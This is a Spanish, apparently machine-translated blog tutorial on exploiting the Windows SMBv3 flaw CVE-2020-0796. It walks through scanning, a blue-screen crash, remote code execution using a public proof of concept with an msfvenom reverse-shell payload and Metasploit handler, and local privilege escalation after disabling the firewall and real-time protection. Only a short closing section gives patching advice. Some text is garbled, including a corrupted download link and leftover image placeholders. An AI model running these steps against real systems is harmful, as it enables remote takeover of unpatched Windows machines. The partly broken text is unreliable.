Tutorial de explotación de vulnerabilidades CVE-2020-0796


Descripción de la vulnerabilidad

  Existe una vulnerabilidad de ejecución remota de código en la forma en que el protocolo Microsoft Server Message Block 3.1.1 (SMBv3) procesa ciertas solicitudes, también conocida como "vulnerabilidad de ejecución remota de código cliente / servidor Windows SMBv3".

Versión de impacto

  • Windows 10 versión 1903 para sistemas de 32 bits
  • Windows 10 versión 1903 (para sistemas basados ​​en ARM64)
  • Windows 10 versión 1903 (para sistemas basados ​​en x64)
  • Windows 10 versión 1909 para sistemas de 32 bits
  • Windows 10 versión 1909 (para sistemas basados ​​en ARM64)
  • Windows 10 versión 1909 (para sistemas basados ​​en x64)
  • Windows Server versión 1903 (instalación Server Core)
  • Windows Server versión 1909 (instalación Server Core)

Detección de vulnerabilidades

Utilice la herramienta:
https://github.com/GuoKerS/aioScan_CVE-2020-0796

Instrucciones:

#安装python模块
python3 -m pip install netaddr

#脚本利用 python3 aioscan_2020_0796.py <ip>
python3 aioscan_2020_0796.py 192.168.206.137

Inserte la descripción de la imagen aquí
Indicar Vulnerable!!que hay una vulnerabilidad

Explotar

Windows 10 versión de 1903 (para sistemas basados en x64) de Thunder descarga dirección:
trueno: // QUFodHRwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZMTlfwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZMTlfwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb1

Ataque de pantalla azul

Utilice la herramienta:
https://github.com/eerykitty/CVE-2020-0796-PoC

Utilice el tutorial:

#进入下载好的脚本目录,安装python模块
python3 -m pip install -r requirements-test.txt
python3 -m pip install ntlm_auth pyasn1 cryptography

#脚本利用
#python3 CVE-2020-0796.py <ip>
python3 CVE-2020-0796.py 192.168.206.137

Inserte la descripción de la imagen aquí

Ejecución remota de código

Versión de Python: 3.6.6
requiere la versión de python3.6. Después de que 3.7 ejecute el script, aparecerá una pantalla azul y no podrá ejecutar comandos remotos.
Enlace de descarga: https://www.python.org/downloads/release/python-366/

Inserte la descripción de la imagen aquí

Utilice la herramienta:
https://github.com/chompie1337/SMBGhost_RCE_PoC

Después de descargar la herramienta, primero genere el código de shell del shell inverso:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.128 lport=4444 -f py -o shellcode.txt

Inserte la descripción de la imagen aquí

Copie shellcode.txtel shell y reemplace buf con USER_PAYLOAD

小技巧,windows的文本工具可以替换字符
Inserte la descripción de la imagen aquí
Copie el exploit.pycódigo de shell modificado en el archivo de script que descargamos , reemplace USER_PAYLOAD
Inserte la descripción de la imagen aquí
kali y habilite la supervisión de msf:

msfconsole

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.206.128
set lport 4444
run

Ataque de explotación de script exp:

python36 exploit.py -ip 192.168.206.141

Cuando se muestre la ejecución [+] Press a key to execute shellcode!,
Inserte la descripción de la imagen aquí
presione Enter msf para obtener los permisos de shell:

shell

Inserte la descripción de la imagen aquí

Escalada local

Descarga usando ataque:
https://github.com/danigargu/CVE-2020-0796

Necesita generar exe, generar exe necesita usar Visual Studio

Después de descargar, abra Visual Studio, cargue el proyecto y abra el archivo CVE-2020-0796.sln . Después de que
Inserte la descripción de la imagen aquí
Inserte la descripción de la imagen aquí
se
Inserte la descripción de la imagen aquí
genere el exe , habrá una \x64\Debug\carpeta en su directorio exp

Inserte la descripción de la imagen aquí
Para copiar el archivo exe para Windows 10, es necesario desactivar el firewall y desactivar la protección en tiempo real.
Inserte la descripción de la imagen aquí
Utilización de secuencias de comandos:

exe se puede ejecutar directamente
Inserte la descripción de la imagen aquí

Sugerencias de reparación

  1. Actualice Windows o instale parches a tiempo: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
  2. Correr regedit.exe, abra el editor del registro, HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\ Parameterscrear un archivo llamado DisableCompressionen DWORD, está 1prohibida característica de compresión SMB.

Supongo que te gusta

Origin blog.csdn.net/weixin_41924764/article/details/109282605
Recomendado
Clasificación